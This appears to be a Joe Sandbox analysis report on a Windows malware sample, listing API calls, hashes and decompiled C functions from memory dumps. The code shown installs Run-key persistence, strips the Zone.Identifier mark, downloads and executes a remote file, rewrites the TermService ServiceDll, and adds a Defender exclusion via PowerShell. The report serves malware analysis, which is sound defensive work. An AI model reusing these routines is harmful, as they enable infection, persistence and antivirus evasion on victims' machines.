                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                      • String ID:
                                      • API String ID: 2174867186-0
                                      • Opcode ID: 92f308fc24c9bea53582ef35b6539a559295224be89a8291aa8cdd56a4ad45dd
                                      • Instruction ID: b8506c2813da2bbd44fcf57aba897f78acdd7d7f2b2753daf208afb86b66ada2
                                      • Opcode Fuzzy Hash: 92f308fc24c9bea53582ef35b6539a559295224be89a8291aa8cdd56a4ad45dd
                                      • Instruction Fuzzy Hash: D60181340007019BD334AF51D98AAAA77F2FF58311F901A2FF153614F5DBB86988CB48
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00CCE20F, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CCE226
                                      • GetLastError.KERNEL32(?,00CCDE49,00000000,00000001,00000000,00000000,?,00CCAE2B,00000000,00000000,00000000,00000000,00000000,?,00CCB3AA,00CCD148), ref: 00CCE232
                                        • Part of subcall function 00CCE1F8: CloseHandle.KERNEL32(FFFFFFFE), ref: 00CCE208
                                      • ___initconout.LIBCMT ref: 00CCE242
                                        • Part of subcall function 00CCE1BA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00CCE1CD
                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CCE257
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                      • String ID:
                                      • API String ID: 2744216297-0
                                      • Opcode ID: e4efe7c812980af05d6bcc50fca4858a7fc6cec9d7aad8bc020ee64398d1d34f
                                      • Instruction ID: 36e47afe68c6c716d1d4bcb40b22bbe7ec4633c496a8cabd622550fa81ef186e
                                      • Opcode Fuzzy Hash: e4efe7c812980af05d6bcc50fca4858a7fc6cec9d7aad8bc020ee64398d1d34f
                                      • Instruction Fuzzy Hash: A3F03036002199BFCF622F95EC45F9E3F2AFB4A3A1F044414FA2989131C7328D60EB90
                                      Uniqueness

                                      Uniqueness Score: 0.53%

                                      Function 00CC59CB, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00CC59D4
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC59E7
                                      • _free.LIBCMT ref: 00CC59F8
                                      • _free.LIBCMT ref: 00CC5A09
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5efe56618d5b9f88bb6258084a8809446b2afd168c76351c581086cc45243356
                                      • Instruction ID: 328d252053b9102fcb2545f7ceea3f5c03bf6af135dfdc586b079670a216298f
                                      • Opcode Fuzzy Hash: 5efe56618d5b9f88bb6258084a8809446b2afd168c76351c581086cc45243356
                                      • Instruction Fuzzy Hash: 04E0EC72812B60BA8A466F54FE45D693F62FB5C714701014BF608B2331CB36067BAFE9
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0043F0C8, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 164fileUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 95%
                                      			E0043F0C8(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, char _a8) {
				WCHAR* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t49;
				void* _t67;
				int _t91;
				char* _t95;
				intOrPtr* _t131;
				WCHAR** _t135;
				void* _t136;
				void* _t138;

				_t138 = __eflags;
				_t131 = __ecx;
				E0043D425( &_v8);
				_t130 = 0xa;
				_t95 =  &_v20;
				E004332D4(_t95, _t130, _t138);
				_push(_t95);
				_push(_t95);
				_t49 = E0043EF0C(_t131, _t95, _t131 + 0x10);
				E0043EF4C(_t131);
				_t91 = 0;
				if(_t49 == 0) {
					L4:
					_t133 = _t131 + 0x10;
					goto L5;
				} else {
					_t140 = _a4;
					if(_a4 == 0) {
						goto L4;
					} else {
						_t130 =  *((intOrPtr*)(_t131 + 0xc));
						_t135 = _t131 + 0x20;
						E00433264(_t135, E0043D75B( &_v12,  *((intOrPtr*)(_t131 + 0xc)), _t140));
						E0043D70F(E00435A2D(_v12), _t135);
						E0043345A( &_v12, _t131 + 0x4c);
						E00433162(E00433297(_t135,  *((intOrPtr*)(_t131 + 0xc)), _t140, "\\"), _t140,  &_v12);
						_t123 = _v12;
						E00435A2D(_v12);
						if(CopyFileW(_v8,  *_t135, 0) != 0) {
							_t124 = _t135;
							E0043304E(_t135, _t130, _t136);
							E004354A5(_t131 + 0x30, _t130, _t136);
							E00435C32( &_v16, _t130, _t124, _t124, _t123, _t123);
							_t133 = _t131 + 0x10;
							E0043EFFE(_t131, 0x80000001, _t131 + 0x10, 0xf003f, 0);
							E0043EFCB(_t131, _t131 + 0x18,  &_v16, 3);
							E00432E66( &_v16);
							L5:
							if( *_t131 == _t91) {
								E0043EFFE(_t131, 0x80000001, _t133, 0xf003f, _t91);
							}
							if(_a8 == _t91) {
								L13:
								E00433412( &_a4,  *(_t131 + 0x20));
								E00433162( &_a4, _t146, E00433412( &_a8, L":Zone.Identifier"));
								E00435A2D(_a8);
								DeleteFileW(_a4);
								_t91 = 1;
								E00435A2D(_a4);
							} else {
								if(_a4 == _t91) {
									E00433264(_t131 + 0x20,  &_v8);
								}
								if(E0043EFFE(_t131 + 4,  *((intOrPtr*)(_t131 + 8)), _t131 + 0x14, 0x20006, _t91) != 0) {
									E0043345A( &_a4, _t131 + 0x54);
									_t67 = E0043EFCB(_t131 + 4,  &_a4, E00432E0A( &_v16, _t130, _t131 + 0x20), 1);
									E00435A2D(_a4);
									E00432E66( &_v16);
									_t146 = _t67;
									if(_t67 != 0) {
										E0043EF4C(_t131 + 4);
										goto L13;
									}
								}
							}
						}
					}
				}
				E00435A2D(_v20);
				E00435A2D(_v8);
				return _t91;
			}















                                      0x0043f0c8
                                      0x0043f0d1
                                      0x0043f0d6
                                      0x0043f0dd
                                      0x0043f0de
                                      0x0043f0e1
                                      0x0043f0e6
                                      0x0043f0e7
                                      0x0043f0ef
                                      0x0043f0f8
                                      0x0043f0fd
                                      0x0043f101
                                      0x0043f1c5
                                      0x0043f1c5
                                      0x00000000
                                      0x0043f107
                                      0x0043f107
                                      0x0043f10a
                                      0x00000000
                                      0x0043f110
                                      0x0043f110
                                      0x0043f116
                                      0x0043f121
                                      0x0043f130
                                      0x0043f13c
                                      0x0043f153
                                      0x0043f158
                                      0x0043f15b
                                      0x0043f16e
                                      0x0043f177
                                      0x0043f179
                                      0x0043f184
                                      0x0043f18c
                                      0x0043f194
                                      0x0043f1a5
                                      0x0043f1b6
                                      0x0043f1be
                                      0x0043f1c8
                                      0x0043f1ca
                                      0x0043f1da
                                      0x0043f1da
                                      0x0043f1e2
                                      0x0043f257
                                      0x0043f25d
                                      0x0043f273
                                      0x0043f27b
                                      0x0043f283
                                      0x0043f28e
                                      0x0043f28f
                                      0x0043f1e4
                                      0x0043f1e7
                                      0x0043f1f0
                                      0x0043f1f0
                                      0x0043f20c
                                      0x0043f219
                                      0x0043f234
                                      0x0043f23e
                                      0x0043f246
                                      0x0043f24b
                                      0x0043f24d
                                      0x0043f252
                                      0x00000000
                                      0x0043f252
                                      0x0043f24d
                                      0x0043f20c
                                      0x0043f1e2
                                      0x0043f16e
                                      0x0043f10a
                                      0x0043f297
                                      0x0043f29f
                                      0x0043f2aa

                                      APIs
                                        • Part of subcall function 0043D425: GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0043F41F,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0043D444
                                        • Part of subcall function 0043EF0C: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,?,0043F0F4,?,?), ref: 0043EF2C
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,?,?,00000000,?,?,00441336,?,?), ref: 0043F283
                                        • Part of subcall function 0043D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0043D78C
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043D70F: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0043D715
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 00433162: lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0043F166
                                        • Part of subcall function 0043EFFE: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,0043F392,80000001,?), ref: 0043F032
                                        • Part of subcall function 0043EFFE: RegOpenKeyExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043F04D
                                        • Part of subcall function 0043EFCB: RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,0043F239,?,00000000,?,00000001,?,?,?), ref: 0043EFEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile$lstrcpy$CloseCopyDeleteDirectoryFolderFreeModuleNameOpenPathSpecialValueVirtuallstrcat
                                      • String ID: :Zone.Identifier
                                      • API String ID: 1638721540-2436405130
                                      • Opcode ID: ed439c0078f00de07f50c5a97037ee7da8962be81f506b31e4766473c0cb99c8
                                      • Instruction ID: 599f7f9652993f71943331d0b67b950569ec96e55e1c31ea43fa73c57f849d74
                                      • Opcode Fuzzy Hash: ed439c0078f00de07f50c5a97037ee7da8962be81f506b31e4766473c0cb99c8
                                      • Instruction Fuzzy Hash: A9516271600509BBDB09FF62DC92CEEB329BF58308F00512FB50656591EF78AE45CB98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0044161E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143UNIQUE
                                      Download Yara Rule
                                      APIs
                                      • SetEvent.KERNEL32(?,?,?,?,?), ref: 00441810
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event
                                      • String ID: (mD$DmD
                                      • API String ID: 4201588131-2164705182
                                      • Opcode ID: b307d4fc2d7443e5bac13065cb265edf9e1eea5a0ad9793b99c921fb8fcf7eb7
                                      • Instruction ID: f0ec14366b69098a8883969d287e300d6991a3defd019712509bf2f95409154b
                                      • Opcode Fuzzy Hash: b307d4fc2d7443e5bac13065cb265edf9e1eea5a0ad9793b99c921fb8fcf7eb7
                                      • Instruction Fuzzy Hash: 10519379A00106DBEB14EF14D98486A7BB6F786305B22852BD85293734CB79EDC0CB5E
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00432675, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82filenetworkUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E00432675(void* __ecx, void* __eflags, signed int _a4) {
				short* _v12;
				void* _v16;
				char _v20;
				void* _t26;
				void* _t36;
				void* _t38;
				void* _t42;
				void* _t58;
				void* _t59;

				_t66 = __eflags;
				_t42 = __ecx;
				_t58 = 0x1a;
				E0043D75B( &_v12, _t58, __eflags);
				_t59 = 0xa;
				_t26 = E004332D4( &_v16, _t59, __eflags);
				E00433162(E00433297( &_v12, _t59, _t66, "\\"), _t66, _t26);
				E00435A2D(_v16);
				_t61 = _a4 + 4;
				E0043345A( &_v16, _a4 + 4);
				E00433162( &_v12, _t66, E0043334A( &_v16,  &_a4));
				E00435A2D(_a4);
				_a4 = _a4 & 0x00000000;
				E00435A2D(_v16);
				_t36 = E0043345A( &_a4, _t61);
				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
				E00435A2D(_a4);
				if(_t36 == 0) {
					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
					_v16 = 2;
					__eflags = _t38 - 0x20;
					if(_t38 > 0x20) {
						_v16 = 0;
					}
				} else {
					_v16 = 1;
				}
				_v20 = 0x442784;
				E00434B53(_t42,  &_v20);
				return E00435A2D(_v12);
			}












                                      0x00432675
                                      0x0043267e
                                      0x00432685
                                      0x00432686
                                      0x0043268d
                                      0x00432691
                                      0x004326a8
                                      0x004326b0
                                      0x004326bb
                                      0x004326bf
                                      0x004326d4
                                      0x004326dc
                                      0x004326e4
                                      0x004326e8
                                      0x004326f4
                                      0x00432702
                                      0x0043270d
                                      0x00432714
                                      0x0043272c
                                      0x00432732
                                      0x00432739
                                      0x0043273c
                                      0x0043273e
                                      0x0043273e
                                      0x00432716
                                      0x00432716
                                      0x00432716
                                      0x00432744
                                      0x0043274e
                                      0x0043275f

                                      APIs
                                        • Part of subcall function 0043D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0043D78C
                                        • Part of subcall function 00433162: lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043334A: PathFindExtensionW.SHLWAPI(?), ref: 00433354
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00432702
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0043272C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                      • String ID: open
                                      • API String ID: 4166385161-2758837156
                                      • Opcode ID: 21d573ecc31148a964c2e78ab16f5c63ee3fce036b1afa9a834bb85b29c4ebfc
                                      • Instruction ID: 1d7a141d5aed499853fa49e7ed9c6239a4e90f113e5ff73ee0ee056807b2069e
                                      • Opcode Fuzzy Hash: 21d573ecc31148a964c2e78ab16f5c63ee3fce036b1afa9a834bb85b29c4ebfc
                                      • Instruction Fuzzy Hash: CF21D335E00208BBCB04BFA2DC86EEEBB34AF88708F10505EF81667191DB785A45CB58
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      Function 0043C1A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043C1A0(void* __edx) {
				void* _v8;
				void* _v12;
				short* _v16;
				int _v20;
				char _v24;
				void* _t28;
				void* _t46;
				int _t48;

				_t46 = __edx;
				_v8 = 0;
				E00433412( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v24 = 0;
				_v20 = 0;
				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
					L3:
					_t48 = 0;
				} else {
					_t28 = E0043EF61( &_v8, _t46, E00433412( &_v12, L"ServiceDll"),  &_v24);
					E00435A2D(_v12);
					if(_t28 != 0) {
						_t48 = E00433075(E00432D08( &_v24, __eflags,  &_v12), 0x447d0c);
						E00435A2D(_v12);
						_v12 = 0;
					} else {
						E0043EF4C( &_v8);
						goto L3;
					}
				}
				E00432E66( &_v24);
				E00435A2D(_v16);
				E0043EF4C( &_v8);
				return _t48;
			}











                                      0x0043c1a0
                                      0x0043c1b2
                                      0x0043c1b5
                                      0x0043c1bd
                                      0x0043c1ca
                                      0x0043c1da
                                      0x0043c20c
                                      0x0043c20c
                                      0x0043c1dc
                                      0x0043c1f1
                                      0x0043c1fb
                                      0x0043c202
                                      0x0043c247
                                      0x0043c249
                                      0x0043c24e
                                      0x0043c204
                                      0x0043c207
                                      0x00000000
                                      0x0043c207
                                      0x0043c202
                                      0x0043c211
                                      0x0043c219
                                      0x0043c221
                                      0x0043c22b

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,00447CD8,?,?,0043C6D5,?,?), ref: 0043C1D2
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0043F3B9,?,0000000A,80000001), ref: 0043EF84
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,0043F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043EFA7
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      Strings
                                      • ServiceDll, xrefs: 0043C1E0
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C1AD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 1903904756-387424650
                                      • Opcode ID: f2b37373d0db639e808bf81f046c50cfdde575743cada564847f672103e466d2
                                      • Instruction ID: c23e37af1a3d891c559c014dd3a11411673a4150319cbeafd3fbbf665f860105
                                      • Opcode Fuzzy Hash: f2b37373d0db639e808bf81f046c50cfdde575743cada564847f672103e466d2
                                      • Instruction Fuzzy Hash: 30116371D00118BBDB14FFE2D9428EEB778AF58704F10119BA801B3191EB785F00DB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 0043BD37, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043BD37(void* __ecx, void* __edx) {
				void* _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char _v28;
				char _v36;
				void* _t26;
				void* _t28;
				void* _t43;
				int _t44;
				void* _t45;

				_t43 = __edx;
				_t45 = __ecx;
				_t44 = 0;
				_v12 = 0;
				E00433412( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v28 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
					_t26 = E0043304E(_t45 + 0x34, _t43,  &_v36);
					_t28 = E0043EFCB( &_v12, E00433412( &_v16, L"ServiceDll"), _t26, 2);
					E00435A2D(_v16);
					_v16 = 0;
					E00432E66( &_v36);
					E0043EF4C( &_v12);
					if(_t28 != 0) {
						_t44 = 1;
					}
				}
				E00432E66( &_v28);
				E00435A2D(_v20);
				E0043EF4C( &_v12);
				return _t44;
			}














                                      0x0043bd37
                                      0x0043bd3f
                                      0x0043bd41
                                      0x0043bd4b
                                      0x0043bd4e
                                      0x0043bd56
                                      0x0043bd63
                                      0x0043bd73
                                      0x0043bd7e
                                      0x0043bd95
                                      0x0043bd9f
                                      0x0043bda7
                                      0x0043bdaa
                                      0x0043bdb2
                                      0x0043bdb9
                                      0x0043bdbb
                                      0x0043bdbb
                                      0x0043bdb9
                                      0x0043bdbf
                                      0x0043bdc7
                                      0x0043bdcf
                                      0x0043bdd9

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0043BD6B
                                        • Part of subcall function 0043EFCB: RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,0043F239,?,00000000,?,00000001,?,?,?), ref: 0043EFEA
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      Strings
                                      • ServiceDll, xrefs: 0043BD84
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043BD43
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 2854241163-387424650
                                      • Opcode ID: 48316bb73545eae32650d8d134d61b3245d498c3ec0a256d04e38f32d138778c
                                      • Instruction ID: cb5fb7306594057f90ec37a8d49f054ff846ac4948be60da11b9fe6d341589d8
                                      • Opcode Fuzzy Hash: 48316bb73545eae32650d8d134d61b3245d498c3ec0a256d04e38f32d138778c
                                      • Instruction Fuzzy Hash: 1B114F71D01118AADB14EF92CD86DEEBB78EF98704F50506EE902A2192EB785B05CA94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 00440D9D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53processUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00440D9D(void* __ecx, void* __eflags) {
				CHAR* _t21;
				CHAR* _t22;

				_t22 = E004310AD(0x100);
				_t21 = E004310AD(0x100);
				E00431052(_t22, 0, 0x100);
				E00431052(_t21, 0, 0x100);
				GetModuleFileNameA(0, _t22, 0x100);
				E0043102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E004310D5("powershell Add-MpPreference -ExclusionPath "));
				_t1 =  &(_t21[0x2b]); // 0x2b
				E0043102C(_t1, _t22, 3);
				_t2 =  &(_t22[0xff]); // 0xff
				E0043102C(E004310D5(_t21) + _t21, _t2, 1);
				return WinExec(_t21, 0);
			}





                                      0x00440dac
                                      0x00440db7
